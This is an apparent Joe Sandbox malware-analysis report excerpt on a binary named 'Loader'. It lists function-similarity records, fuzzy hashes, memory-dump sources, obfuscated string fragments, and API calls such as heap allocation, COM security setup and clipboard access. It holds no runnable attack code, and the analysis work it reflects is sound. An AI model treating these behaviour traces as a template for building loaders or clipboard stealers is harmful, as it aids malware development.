                                                                                        • API ID: Info
                                                                                        • String ID:
                                                                                        • API String ID: 1807457897-0
                                                                                        • Opcode ID: d43989f8238828233f6e9f9aac7ca9c7187fcdfc11a8cd976d2224bdfa69373f
                                                                                        • Instruction ID: c7440048b1648510dceb1c6852c106bf279e338a9d7325fda88554955c380784
                                                                                        • Opcode Fuzzy Hash: d43989f8238828233f6e9f9aac7ca9c7187fcdfc11a8cd976d2224bdfa69373f
                                                                                        • Instruction Fuzzy Hash: 5B5127B190815DAADB198E28CC84BEABFA8FF25B08F1401EDD599C7182D3359D45CF61
                                                                                        APIs
                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B308,00000000,00000001), ref: 0043C302
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
                                                                                        • Instruction ID: 8a0177ad85e7c08c69245f52b8f4417eb00afcd063061f7275faf4d6d67a0887
                                                                                        • Opcode Fuzzy Hash: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
                                                                                        • Instruction Fuzzy Hash: AAE02B76418221ABC6002B25BC09B5B3A68DF8E721F030C36F40072121D739E81286EF
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: a18d56fad5a96f013a25ab8829a1815cfaa1a5b039c676a3c735c5b8ea5e42e4
                                                                                        • Instruction ID: 1b26c67158fdd6cda6fdecceee19ec6b2839f0717a30f5b989b10993f200af12
                                                                                        • Opcode Fuzzy Hash: a18d56fad5a96f013a25ab8829a1815cfaa1a5b039c676a3c735c5b8ea5e42e4
                                                                                        • Instruction Fuzzy Hash: C201ECB560D3819FD305CF24D46470ABBF0EF46304F05889DE5958B2A2C775A949CF56
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: a8bb812586e4c46681c8ad4fa8ef5685346ea06700b989548cf1ce1faff14cc7
                                                                                        • Instruction ID: 935b5868952aa2069f21c57713507472c84af2c432f668984a81a3c1c2622ac8
                                                                                        • Opcode Fuzzy Hash: a8bb812586e4c46681c8ad4fa8ef5685346ea06700b989548cf1ce1faff14cc7
                                                                                        • Instruction Fuzzy Hash: AAF0A4B55087029FE310DF65D55870BBBE1AB85318F15891CE0944B254D7B5A5498FC2
                                                                                        APIs
                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
                                                                                        • Instruction ID: ce014e1d32f27ec12ad37ecc0dfb2a09a1fae06e6abce3ab2790199683b38062
                                                                                        • Opcode Fuzzy Hash: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
                                                                                        • Instruction Fuzzy Hash: CFD02E2969000027D208AB2CAC07F23329D9B03B52F000239E1A3969E2ED406900826A
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C607
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 640775948-0
                                                                                        • Opcode ID: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
                                                                                        • Instruction ID: 64d0c7dc1a51f575c656917cfcf27d06668b7b4f648f1d88eb1df91404deb98c
                                                                                        • Opcode Fuzzy Hash: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
                                                                                        • Instruction Fuzzy Hash: C7D0C9743C834176F5348B08EC13F5132555302F12F340624F362FE2E4CAD0B201860C
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C31B,?,0040B308,00000000,00000001), ref: 0043A960
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
                                                                                        • Instruction ID: c567b57adf38a1f54fef76dd5790cc9636adae08f6cfb23484a9f5fe40784e0e
                                                                                        • Opcode Fuzzy Hash: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
                                                                                        • Instruction Fuzzy Hash: 42D01272419632FBC6102F18BC15BCB3B55EF4A321F0748A2F5446A175D774DC91CAD8
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A931
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
                                                                                        • Instruction ID: 2264aa9d2aabd2ef6d2248d85dbb31dab42ea94ade32cd6cf29d8f8327bb6f23
                                                                                        • Opcode Fuzzy Hash: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
                                                                                        • Instruction Fuzzy Hash: 18A012300401109AC5141B00BD09FC53E10DB11211F010051B000040B182508841C5C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
                                                                                        • API String ID: 0-2173774466
                                                                                        • Opcode ID: 756f7b0933827cf2b67dc0df76dc687c74b968bdae32b9d0fabc7d97671765a6
                                                                                        • Instruction ID: af53e175c28fad5d8c2a468ceeaa10e57feed0e13a8b405b96cf19100150d275
                                                                                        • Opcode Fuzzy Hash: 756f7b0933827cf2b67dc0df76dc687c74b968bdae32b9d0fabc7d97671765a6
                                                                                        • Instruction Fuzzy Hash: BA13BE7160C7C08AD335DB38C4443AFBBE1ABD6314F188A6EE4D987392D6B98581CB57
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                        • API String ID: 0-2551631551
                                                                                        • Opcode ID: 2e1487be5e160dde3cb2099712e244fca7148de13dbc5873c5731017f8a6f69d
                                                                                        • Instruction ID: 770335e5a42f9b4d615ca172ea7afd8b2f0587deb4f207754e917c3cbcfa6561
                                                                                        • Opcode Fuzzy Hash: 2e1487be5e160dde3cb2099712e244fca7148de13dbc5873c5731017f8a6f69d
                                                                                        • Instruction Fuzzy Hash: 2C224121D087D98DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7794A46CBA6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                        • API String ID: 0-2551631551
                                                                                        • Opcode ID: 4134afc953a5d969655b1307a453eca2e2e2adfc96ef722da3857e9020b64b7e
                                                                                        • Instruction ID: de50ea2c20b4176c8acefd8da3a13ecea5557a43b1ccc23e89203943b2e10b97
                                                                                        • Opcode Fuzzy Hash: 4134afc953a5d969655b1307a453eca2e2e2adfc96ef722da3857e9020b64b7e
                                                                                        • Instruction Fuzzy Hash: 99225121D087DA8DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7754A46CBA6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
                                                                                        • API String ID: 0-379513683
                                                                                        • Opcode ID: 4e3a5e5ada1ce48c2110f860dc72302ab2009045dbcee54d2719bf77ed452430
                                                                                        • Instruction ID: fbc6194e022bf2d7584349dbc9d518ea0f683462fe8accb2f8c95ac37d1c220e
                                                                                        • Opcode Fuzzy Hash: 4e3a5e5ada1ce48c2110f860dc72302ab2009045dbcee54d2719bf77ed452430
                                                                                        • Instruction Fuzzy Hash: EBF1D2319087E98ADB36C63C8C543DDBEA25B56324F0843E9C4ED6B3D2C6B50BC58B56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
                                                                                        • API String ID: 0-2572281532
                                                                                        • Opcode ID: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                        • Instruction ID: fc9c91e7f1a30bb03526ffdc58390b239219c7e1b2437cd68821ef081b52b0d4
                                                                                        • Opcode Fuzzy Hash: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                        • Instruction Fuzzy Hash: B581BEB29193918BC33A8F15C8853DFBBE2FBC0304F59892DC4999B354DB754602CB4A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                        • API String ID: 0-416511104
                                                                                        • Opcode ID: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
                                                                                        • Instruction ID: 3a13b98e1fcd4ee340008fd0ff9d0d16dd32adc4ff5d5dd5518182cac15cbb42
                                                                                        • Opcode Fuzzy Hash: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
                                                                                        • Instruction Fuzzy Hash: 2E420AB560C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                        • API String ID: 0-416511104
                                                                                        • Opcode ID: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
                                                                                        • Instruction ID: ca3b89ee566e4ff942ad83ab59672ef17daa3edc381adbb1ac583b775d9a42f8
                                                                                        • Opcode Fuzzy Hash: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
                                                                                        • Instruction Fuzzy Hash: 4A421CB520C3D48AC334CF54D442B9FBAF2FB92304F40882DC5D96B615DBB54A468B9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -$1$8H$?$Hg@$M5/$Ph7m$z&$-CV
                                                                                        • API String ID: 0-3808867540
                                                                                        • Opcode ID: 5738cec0cd070931a0bd783de9f3970d3231cfa437676acf953e2766095c838c
                                                                                        • Instruction ID: d9ec357a2f8233dc95ae847e4ea7abc86a244de867b874025c8ba10d5d92dae9
                                                                                        • Opcode Fuzzy Hash: 5738cec0cd070931a0bd783de9f3970d3231cfa437676acf953e2766095c838c
                                                                                        • Instruction Fuzzy Hash: 2FF30175D012698FCB58CFA9D9916ECBBF1FF58310F1481AAE498E7381E2385A81DF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ;\q$$>$Cd($FO}$FO}$H<~O$`$h$|$|
                                                                                        • API String ID: 0-1321615942
                                                                                        • Opcode ID: d4531aded3b414f1182a6519129ae5696528d523657ed0a8a391442540f6f545
                                                                                        • Instruction ID: cd8e576c554ce56a4545c70e44c18204c00b7a719232fd999c0f67f560bb0097
                                                                                        • Opcode Fuzzy Hash: d4531aded3b414f1182a6519129ae5696528d523657ed0a8a391442540f6f545
                                                                                        • Instruction Fuzzy Hash: 59C3F175D022698FCB68CFA9D9916ECBBF0FB58314F1481AAE458E7385D3349A85CF10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &x&z$.|#~$/pQr$<|8~$a()*$d<h>$l0f2$m4f6$ws$|x
                                                                                        • API String ID: 0-1443210402
                                                                                        • Opcode ID: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                        • Instruction ID: 5a455e5b33dc051389bcb969b85f11440245edd1c99918e46ba8560acc0916f5
                                                                                        • Opcode Fuzzy Hash: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                        • Instruction Fuzzy Hash: E9F176B5600B02DFD3348F25D895797BBE1FB46315F118A2CD5AA8BBA0C775A805CF88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $%$)$.$?$C$K$Y$v$v
                                                                                        • API String ID: 0-1948704018
                                                                                        • Opcode ID: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                        • Instruction ID: f70cb8b5534ef894ef439ad6c336ad61d0d4793a511eb9a38b6a33aaea9181ad
                                                                                        • Opcode Fuzzy Hash: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                        • Instruction Fuzzy Hash: 15A14D23A0C7D14AD321857D4C8425BEEC30BEA224F1ECB6ED8E5973C6D579C9069393
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                        • String ID: T
                                                                                        • API String ID: 2832541153-3187964512
                                                                                        • Opcode ID: f69b22f7e65234b8b8295d773221abc16353644711cc119bd34ed76aaf3f7017
                                                                                        • Instruction ID: 2c952f62104fe5d4509db1f6639d41a4f4bf987f5331e4494cef66cb5abed10d
                                                                                        • Opcode Fuzzy Hash: f69b22f7e65234b8b8295d773221abc16353644711cc119bd34ed76aaf3f7017
                                                                                        • Instruction Fuzzy Hash: 6841E6B160C7818ED310AF7C998835FBED05B86324F044B3EE5E5862D2D6788689C79B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        APIs
